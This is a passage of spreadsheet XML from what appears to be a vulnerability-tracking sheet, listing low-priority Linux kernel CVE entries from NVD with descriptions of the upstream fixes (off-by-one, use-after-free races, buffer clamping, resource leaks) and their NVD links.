        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C882" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93064</t>
        </is>
      </c>
      <c r="D882" s="5" t="inlineStr"/>
      <c r="E882" s="5" t="inlineStr"/>
      <c r="F882" s="5" t="inlineStr"/>
      <c r="G882" s="5" t="inlineStr"/>
      <c r="H882" s="5" t="inlineStr"/>
      <c r="I882" s="5" t="inlineStr"/>
      <c r="J882" s="5" t="inlineStr"/>
      <c r="K882" s="5" t="inlineStr"/>
      <c r="L882" s="5" t="inlineStr"/>
      <c r="M882" s="5" t="inlineStr"/>
      <c r="N882" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O882" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P882" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q882" s="5" t="inlineStr"/>
      <c r="R882" s="5" t="inlineStr"/>
      <c r="S882" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: mvm: fix off-by-one in TXF key sanitiser
iwl_mvm_frob_txf_key_iter() tracks the last matched byte position
in loop variable 'i'. When a full key match is found (match ==
keylen), 'i' points at the last byte of the matched key. The
memset start offset should therefore be i + 1 - keylen, not
i - keylen; the current code zeroes one byte before the match
and leaves the final key byte un-sanitised.</t>
        </is>
      </c>
      <c r="T882" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93064</t>
        </is>
      </c>
    </row>
    <row r="883">
      <c r="A883" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B883" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C883" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93065</t>
        </is>
      </c>
      <c r="D883" s="5" t="inlineStr"/>
      <c r="E883" s="5" t="inlineStr"/>
      <c r="F883" s="5" t="inlineStr"/>
      <c r="G883" s="5" t="inlineStr"/>
      <c r="H883" s="5" t="inlineStr"/>
      <c r="I883" s="5" t="inlineStr"/>
      <c r="J883" s="5" t="inlineStr"/>
      <c r="K883" s="5" t="inlineStr"/>
      <c r="L883" s="5" t="inlineStr"/>
      <c r="M883" s="5" t="inlineStr"/>
      <c r="N883" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O883" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P883" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q883" s="5" t="inlineStr"/>
      <c r="R883" s="5" t="inlineStr"/>
      <c r="S883" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
wifi: iwlwifi: fix counter type in iwl_fwrt_dump_error_logs
The loop counter 'count' was declared as u8 while num_pc is u32.
If firmware advertises more than 255 PC entries the counter wraps
back to zero and the loop never terminates potentially causing an
infinite loop or reading past the allocated pc_data array.
Change the declaration to u32 to match num_pc.</t>
        </is>
      </c>
      <c r="T883" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93065</t>
        </is>
      </c>
    </row>
    <row r="884">
      <c r="A884" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B884" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C884" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93066</t>
        </is>
      </c>
      <c r="D884" s="5" t="inlineStr"/>
      <c r="E884" s="5" t="inlineStr"/>
      <c r="F884" s="5" t="inlineStr"/>
      <c r="G884" s="5" t="inlineStr"/>
      <c r="H884" s="5" t="inlineStr"/>
      <c r="I884" s="5" t="inlineStr"/>
      <c r="J884" s="5" t="inlineStr"/>
      <c r="K884" s="5" t="inlineStr"/>
      <c r="L884" s="5" t="inlineStr"/>
      <c r="M884" s="5" t="inlineStr"/>
      <c r="N884" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O884" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P884" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q884" s="5" t="inlineStr"/>
      <c r="R884" s="5" t="inlineStr"/>
      <c r="S884" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
x86/mm/pat: Take cpa_lock around large-page collapse
Loading and unloading modules concurrently on several CPUs on a KASAN
build, with a short delay injected at the CPA page-table lookup to
widen the window, faults within minutes:
  BUG: KASAN: use-after-free in __change_page_attr+0x7cc/0x7e0
  Write of size 8 at addr ffff888181139718 by task modprobe
  ...
  The buggy address belongs to the physical page:
   pfn:0x181139 ... page_type: f2(table)
cpa_collapse_large_pages() rebuilds a leaf PMD from its 4K PTEs and
frees the old PTE-table pages, while __change_page_attr() fetches a
PTE pointer from a lockless lookup_address_in_pgd_attr() and writes
it with set_pte_atomic() only later. When module text is served from
a shared large ROX mapping the two run on the same PMD:
  CPU A (module load)              CPU B (module finalize)
  -------------------              -----------------------
  execmem_make_temp_rw
   set_memory_nx
    __change_page_attr
     split 2M -&gt; 4K table P
     kpte = &amp;P[i]  (lockless)
                                   execmem_restore_rox
                                    set_memory_rox (CPA_COLLAPSE)
                                     cpa_collapse_large_pages
                                      rebuild leaf PMD
                                      flush_tlb_all
                                      pagetable_free(P)
     set_pte_atomic(kpte, ...)
       -&gt; writes into freed P
P is a page-table page (page_type: table), reused at once, so the
write corrupts whatever got the page next: a bad-pte or bad-page
splat, or a fatal fault once P has been turned into read-only text.
The flush_tlb_all() before the free does not close this: its IPI only
serializes against page-table walkers that run with interrupts off
(e.g. GUP-fast); the walk in __change_page_attr() runs with interrupts
on, so nothing stops it from holding a stale pointer into P.
Serialize the collapse - the PMD rebuild, TLB flush and PTE-table
free - under cpa_lock, the same lock __change_page_attr() now takes
unconditionally since commit ("x86/mm/pat: stop gating cpa_lock on
debug_pagealloc_enabled()"), so a concurrent walker can no longer
hold a pointer into a table the collapse is about to free.</t>
        </is>
      </c>
      <c r="T884" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93066</t>
        </is>
      </c>
    </row>
    <row r="885">
      <c r="A885" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B885" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C885" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93067</t>
        </is>
      </c>
      <c r="D885" s="5" t="inlineStr"/>
      <c r="E885" s="5" t="inlineStr"/>
      <c r="F885" s="5" t="inlineStr"/>
      <c r="G885" s="5" t="inlineStr"/>
      <c r="H885" s="5" t="inlineStr"/>
      <c r="I885" s="5" t="inlineStr"/>
      <c r="J885" s="5" t="inlineStr"/>
      <c r="K885" s="5" t="inlineStr"/>
      <c r="L885" s="5" t="inlineStr"/>
      <c r="M885" s="5" t="inlineStr"/>
      <c r="N885" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O885" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P885" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q885" s="5" t="inlineStr"/>
      <c r="R885" s="5" t="inlineStr"/>
      <c r="S885" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/bridge: tc358767: clamp the reported AUX read size to the request
tc_aux_transfer() clamps an AUX read to the payload limit:
	size_t size = min_t(size_t, DP_AUX_MAX_PAYLOAD_BYTES - 1, msg-&gt;size);
After the transfer it replaces size with the byte count the controller
reports in AUX_BYTES:
	if (size)
		size = FIELD_GET(AUX_BYTES, auxstatus);
AUX_BYTES is GENMASK(15, 8), so it can be up to 255. Nothing clamps it
back to the request. tc_aux_read_data() reads that many bytes into the
16-byte auxrdata stack buffer, then copies them into the caller buffer. A
reported count of 255 makes the read run to 256 bytes and overruns both.
The controller should never report more than it was asked to transfer, so
this is defense in depth rather than a live hole. The reported count is
only lightly trusted, and the check is cheap. Clamp it back to the request,
the same way ti-sn65dsi86 does in commit aca58eac52b8 ("drm/bridge:
ti-sn65dsi86: Never store more than msg-&gt;size bytes in AUX xfer").</t>
        </is>
      </c>
      <c r="T885" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93067</t>
        </is>
      </c>
    </row>
    <row r="886">
      <c r="A886" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B886" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C886" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93068</t>
        </is>
      </c>
      <c r="D886" s="5" t="inlineStr"/>
      <c r="E886" s="5" t="inlineStr"/>
      <c r="F886" s="5" t="inlineStr"/>
      <c r="G886" s="5" t="inlineStr"/>
      <c r="H886" s="5" t="inlineStr"/>
      <c r="I886" s="5" t="inlineStr"/>
      <c r="J886" s="5" t="inlineStr">
        <is>
          <t>sap</t>
        </is>
      </c>
      <c r="K886" s="5" t="inlineStr"/>
      <c r="L886" s="5" t="inlineStr"/>
      <c r="M886" s="5" t="inlineStr"/>
      <c r="N886" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O886" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P886" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q886" s="5" t="inlineStr"/>
      <c r="R886" s="5" t="inlineStr"/>
      <c r="S886" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
drm/amd/display: Fix DM I2C teardown race
DM I2C adapters can remain visible to userspace while DM teardown is
already in progress. A concurrent i2c-dev transfer may then enter
amdgpu_dm_i2c_xfer() after the backing DM state has been torn down,
leading to a NULL pointer dereference.
Create a devres group around the DM I2C adapter lifetime and release it
at the start of dm_hw_fini(), before HPD, IRQ, and DM state are torn
down. This removes the I2C adapters first and waits for in-flight users
to drain before the structures used by amdgpu_dm_i2c_xfer() disappear.
This fixes a teardown ordering race seen during device removal:
BUG: kernel NULL pointer dereference
RIP: amdgpu_dm_i2c_xfer+0x122/0x1c0 [amdgpu]
Call Trace:
__i2c_transfer
i2c_transfer
i2cdev_ioctl_rdwr</t>
        </is>
      </c>
      <c r="T886" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93068</t>
        </is>
      </c>
    </row>
    <row r="887">
      <c r="A887" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B887" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C887" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93069</t>
        </is>
      </c>
      <c r="D887" s="5" t="inlineStr"/>
      <c r="E887" s="5" t="inlineStr"/>
      <c r="F887" s="5" t="inlineStr"/>
      <c r="G887" s="5" t="inlineStr"/>
      <c r="H887" s="5" t="inlineStr"/>
      <c r="I887" s="5" t="inlineStr"/>
      <c r="J887" s="5" t="inlineStr"/>
      <c r="K887" s="5" t="inlineStr"/>
      <c r="L887" s="5" t="inlineStr"/>
      <c r="M887" s="5" t="inlineStr"/>
      <c r="N887" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O887" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P887" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q887" s="5" t="inlineStr"/>
      <c r="R887" s="5" t="inlineStr"/>
      <c r="S887" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
OPP: Fix cleanup ordering
Commit 173e02d67494 ("OPP: Initialize scope-based pointers inline")
added initialization for all pointers. In some cases, the ordering was
changed so that *opp_table was initialized after *opp. This also changes
the order of the registered cleanup functions.
When the cleanup happens, this can cause use-after-free errors when the
last reference is released and the release function _opp_kref_release
tries to access the already freed opp-&gt;opp_table.
Initialize *opp_table before *opp again to fix this and ensure the
correct cleanup order.</t>
        </is>
      </c>
      <c r="T887" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93069</t>
        </is>
      </c>
    </row>
    <row r="888">
      <c r="A888" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B888" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C888" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93070</t>
        </is>
      </c>
      <c r="D888" s="5" t="inlineStr"/>
      <c r="E888" s="5" t="inlineStr"/>
      <c r="F888" s="5" t="inlineStr"/>
      <c r="G888" s="5" t="inlineStr"/>
      <c r="H888" s="5" t="inlineStr"/>
      <c r="I888" s="5" t="inlineStr"/>
      <c r="J888" s="5" t="inlineStr"/>
      <c r="K888" s="5" t="inlineStr"/>
      <c r="L888" s="5" t="inlineStr"/>
      <c r="M888" s="5" t="inlineStr"/>
      <c r="N888" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O888" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P888" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q888" s="5" t="inlineStr"/>
      <c r="R888" s="5" t="inlineStr"/>
      <c r="S888" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: ipu6: Do not free aux device pdata after init
ipu6_bus_initialize_device() stores the isys/psys pdata pointer in
struct ipu6_bus_device and initializes the auxiliary device. After that
point, error unwinding must drop the auxiliary device reference and let
ipu6_bus_release() free both the bus device and adev-&gt;pdata.
The isys and psys init paths already call put_device() when MMU
initialization fails, and ipu6_bus_add_device() calls
auxiliary_device_uninit() on auxiliary_device_add() failure. Both paths
therefore run the bus release callback. The extra kfree(pdata) in the
callers can release the same object a second time.
Remove the manual pdata frees after the auxiliary device has been
initialized.
This issue was found by a static analysis checker and confirmed by
manual source review.</t>
        </is>
      </c>
      <c r="T888" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93070</t>
        </is>
      </c>
    </row>
    <row r="889">
      <c r="A889" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B889" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C889" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93071</t>
        </is>
      </c>
      <c r="D889" s="5" t="inlineStr"/>
      <c r="E889" s="5" t="inlineStr"/>
      <c r="F889" s="5" t="inlineStr"/>
      <c r="G889" s="5" t="inlineStr"/>
      <c r="H889" s="5" t="inlineStr"/>
      <c r="I889" s="5" t="inlineStr"/>
      <c r="J889" s="5" t="inlineStr"/>
      <c r="K889" s="5" t="inlineStr"/>
      <c r="L889" s="5" t="inlineStr"/>
      <c r="M889" s="5" t="inlineStr"/>
      <c r="N889" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O889" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P889" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q889" s="5" t="inlineStr"/>
      <c r="R889" s="5" t="inlineStr"/>
      <c r="S889" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: bcm2835-unicam: Fix asc leaked in error/remove path
v4l2_async_nf_add_fwnode_remote() allocates the asc, which is freed when
v4l2_async_nf_cleanup() is called.
Call v4l2_async_nf_cleanup() properly in the driver paths.
Discovered with kmemleak after rmmod:
unreferenced object 0xffff000084526b80 (size 64):
  comm "modprobe", pid 185, jiffies 4295013512
  hex dump (first 32 bytes):
    01 00 00 00 00 00 00 00 e8 0d ff bf 00 00 ff ff  ................
    40 83 bc 84 00 00 ff ff 60 83 bc 84 00 00 ff ff  @.......`.......
  backtrace (crc ac584083):
    [&lt;00000000ffb081a7&gt;] kmemleak_alloc+0x38/0x44
    [&lt;00000000d2fd9301&gt;] __kmalloc+0x1b0/0x250
    [&lt;000000004dd5354d&gt;] __v4l2_async_nf_add_fwnode+0x28/0x9c
    [&lt;0000000067587657&gt;] __v4l2_async_nf_add_fwnode_remote+0x3c/0x64</t>
        </is>
      </c>
      <c r="T889" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93071</t>
        </is>
      </c>
    </row>
    <row r="890">
      <c r="A890" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B890" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C890" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93072</t>
        </is>
      </c>
      <c r="D890" s="5" t="inlineStr"/>
      <c r="E890" s="5" t="inlineStr"/>
      <c r="F890" s="5" t="inlineStr"/>
      <c r="G890" s="5" t="inlineStr"/>
      <c r="H890" s="5" t="inlineStr"/>
      <c r="I890" s="5" t="inlineStr"/>
      <c r="J890" s="5" t="inlineStr"/>
      <c r="K890" s="5" t="inlineStr"/>
      <c r="L890" s="5" t="inlineStr"/>
      <c r="M890" s="5" t="inlineStr"/>
      <c r="N890" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O890" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P890" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q890" s="5" t="inlineStr"/>
      <c r="R890" s="5" t="inlineStr"/>
      <c r="S890" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
irqchip/renesas-irqc: Fix generic interrupt chip leak on remove
The driver allocates domain generic chips probe. However, on driver
removal, the generic chips are not automatically freed when the interrupt
domain is removed because the domain flags do not include
IRQ_DOMAIN_FLAG_DESTROY_GC.
This causes both the domain generic chips structure and the associated
generic chips to be leaked. Additionally, the generic chips remain on the
global list and may later be accessed by generic interrupt chip suspend,
resume, or shutdown callbacks after the driver has been removed,
potentially resulting in a use-after-free and kernel crash.
Fix the resource leak by setting IRQ_DOMAIN_FLAG_DESTROY_GC on the
interrupt domain; this lets the interrupt domain core automatically
release all generic chips when irq_domain_remove() is invoked, removing
the need for manual cleanup calls in error paths and remove callback.</t>
        </is>
      </c>
      <c r="T890" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93072</t>
        </is>
      </c>
    </row>
    <row r="891">
      <c r="A891" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B891" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C891" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93073</t>
        </is>
      </c>
      <c r="D891" s="5" t="inlineStr"/>
      <c r="E891" s="5" t="inlineStr"/>
      <c r="F891" s="5" t="inlineStr"/>
      <c r="G891" s="5" t="inlineStr"/>
      <c r="H891" s="5" t="inlineStr"/>
      <c r="I891" s="5" t="inlineStr"/>
      <c r="J891" s="5" t="inlineStr"/>
      <c r="K891" s="5" t="inlineStr"/>
      <c r="L891" s="5" t="inlineStr"/>
      <c r="M891" s="5" t="inlineStr"/>
      <c r="N891" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O891" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P891" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q891" s="5" t="inlineStr"/>
      <c r="R891" s="5" t="inlineStr"/>
      <c r="S891" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax: read holder_ops once in dax_holder_notify_failure()
dax_holder_notify_failure() reads dax_dev-&gt;holder_ops twice without
READ_ONCE() -- once for the NULL check and once for the indirect
notify_failure() call. A concurrent fs_put_dax() can clear holder_ops
between the two reads, so the check can observe a non-NULL pointer while
the call dereferences NULL. (kill_dax() also clears holder_ops, but only
after synchronize_srcu(), so it cannot race a reader that is inside
dax_read_lock(); fs_put_dax() does no such synchronization.)
Fetch holder_ops once into a local with READ_ONCE() so the NULL check and
the indirect call observe the same value.</t>
        </is>
      </c>
      <c r="T891" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93073</t>
        </is>
      </c>
    </row>
    <row r="892">
      <c r="A892" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B892" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C892" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93074</t>
        </is>
      </c>
      <c r="D892" s="5" t="inlineStr"/>
      <c r="E892" s="5" t="inlineStr"/>
      <c r="F892" s="5" t="inlineStr"/>
      <c r="G892" s="5" t="inlineStr"/>
      <c r="H892" s="5" t="inlineStr"/>
      <c r="I892" s="5" t="inlineStr"/>
      <c r="J892" s="5" t="inlineStr"/>
      <c r="K892" s="5" t="inlineStr"/>
      <c r="L892" s="5" t="inlineStr"/>
      <c r="M892" s="5" t="inlineStr"/>
      <c r="N892" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O892" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P892" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q892" s="5" t="inlineStr"/>
      <c r="R892" s="5" t="inlineStr"/>
      <c r="S892" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax/fsdev: use __va(phys) for kaddr in direct_access
Use __va(phys) instead of virt_addr + linear_offset for the kaddr
return in __fsdev_dax_direct_access(). The previous code added a
device-linear byte offset to virt_addr (which is __va of ranges[0]),
but for multi-range devices with physical gaps between ranges, this
linear arithmetic crosses the gap and produces a wrong kernel virtual
address. Using __va(phys) where phys comes from dax_pgoff_to_phys()
is correct for any range layout because the direct map translates
each physical address independently.
This leaves dev_dax-&gt;virt_addr write-only, so remove the field
(suggested by Dave Jiang).</t>
        </is>
      </c>
      <c r="T892" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93074</t>
        </is>
      </c>
    </row>
    <row r="893">
      <c r="A893" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B893" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C893" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93075</t>
        </is>
      </c>
      <c r="D893" s="5" t="inlineStr"/>
      <c r="E893" s="5" t="inlineStr"/>
      <c r="F893" s="5" t="inlineStr"/>
      <c r="G893" s="5" t="inlineStr"/>
      <c r="H893" s="5" t="inlineStr"/>
      <c r="I893" s="5" t="inlineStr"/>
      <c r="J893" s="5" t="inlineStr"/>
      <c r="K893" s="5" t="inlineStr"/>
      <c r="L893" s="5" t="inlineStr"/>
      <c r="M893" s="5" t="inlineStr"/>
      <c r="N893" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O893" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P893" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q893" s="5" t="inlineStr"/>
      <c r="R893" s="5" t="inlineStr"/>
      <c r="S893" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax/fsdev: clear pgmap ops and owner on unbind
fsdev_dax_probe() sets pgmap-&gt;ops = &amp;fsdev_pagemap_ops and
pgmap-&gt;owner = dev_dax, but nothing ever clears them. For a dynamic
device the pgmap is devm-allocated and freed on unbind, so this is
harmless. For a static device the pgmap is the shared, long-lived one
owned by the dax bus (kill_dev_dax() only NULLs dev_dax-&gt;pgmap for the
non-static case), and device.c's probe sets only pgmap-&gt;type, never
clearing ops/owner.
So after fsdev unbinds a static device the stale fsdev_pagemap_ops
survives on the shared pgmap. If the device is then rebound to
device_dax (MEMORY_DEVICE_GENERIC, which installs no -&gt;memory_failure),
or the fsdev_dax module is unloaded, a subsequent memory_failure on that
pgmap dispatches through the stale -- and possibly freed -- handler.
Register a devm action that clears pgmap-&gt;ops and pgmap-&gt;owner on unbind,
symmetric with setting them at probe, so the pgmap carries no fsdev state
once fsdev is detached.</t>
        </is>
      </c>
      <c r="T893" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93075</t>
        </is>
      </c>
    </row>
    <row r="894">
      <c r="A894" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B894" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C894" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93076</t>
        </is>
      </c>
      <c r="D894" s="5" t="inlineStr"/>
      <c r="E894" s="5" t="inlineStr"/>
      <c r="F894" s="5" t="inlineStr"/>
      <c r="G894" s="5" t="inlineStr"/>
      <c r="H894" s="5" t="inlineStr"/>
      <c r="I894" s="5" t="inlineStr"/>
      <c r="J894" s="5" t="inlineStr"/>
      <c r="K894" s="5" t="inlineStr"/>
      <c r="L894" s="5" t="inlineStr"/>
      <c r="M894" s="5" t="inlineStr"/>
      <c r="N894" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O894" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P894" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q894" s="5" t="inlineStr"/>
      <c r="R894" s="5" t="inlineStr"/>
      <c r="S894" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
dax/fsdev: clear vmemmap_shift when binding static pgmap
Clear pgmap-&gt;vmemmap_shift for static DAX devices. When rebinding a static
device from device_dax (which may set vmemmap_shift based on alignment) to
fsdev_dax, the stale vmemmap_shift persists on the shared pgmap. Explicitly
zero it before devm_memremap_pages() so the vmemmap is built for order-0
folios as fsdev requires.</t>
        </is>
      </c>
      <c r="T894" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93076</t>
        </is>
      </c>
    </row>
    <row r="895">
      <c r="A895" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B895" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C895" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93077</t>
        </is>
      </c>
      <c r="D895" s="5" t="inlineStr"/>
      <c r="E895" s="5" t="inlineStr"/>
      <c r="F895" s="5" t="inlineStr"/>
      <c r="G895" s="5" t="inlineStr"/>
      <c r="H895" s="5" t="inlineStr"/>
      <c r="I895" s="5" t="inlineStr"/>
      <c r="J895" s="5" t="inlineStr"/>
      <c r="K895" s="5" t="inlineStr"/>
      <c r="L895" s="5" t="inlineStr"/>
      <c r="M895" s="5" t="inlineStr"/>
      <c r="N895" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O895" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P895" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q895" s="5" t="inlineStr"/>
      <c r="R895" s="5" t="inlineStr"/>
      <c r="S895" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
cxl/features: Clamp Get Feature output size to the remaining buffer
cxl_get_feature() reads a feature in a loop but passes a fixed size_out
as the output capacity every iteration. On the last partial iteration
the buffer has less room left, so a device that returns more than asked
can overflow feat_out.
Use the per-iter size data_to_rd_size, which already tracks the
remaining room, as the output capacity.</t>
        </is>
      </c>
      <c r="T895" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93077</t>
        </is>
      </c>
    </row>
    <row r="896">
      <c r="A896" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B896" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C896" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93078</t>
        </is>
      </c>
      <c r="D896" s="5" t="inlineStr"/>
      <c r="E896" s="5" t="inlineStr"/>
      <c r="F896" s="5" t="inlineStr"/>
      <c r="G896" s="5" t="inlineStr"/>
      <c r="H896" s="5" t="inlineStr"/>
      <c r="I896" s="5" t="inlineStr"/>
      <c r="J896" s="5" t="inlineStr"/>
      <c r="K896" s="5" t="inlineStr"/>
      <c r="L896" s="5" t="inlineStr"/>
      <c r="M896" s="5" t="inlineStr"/>
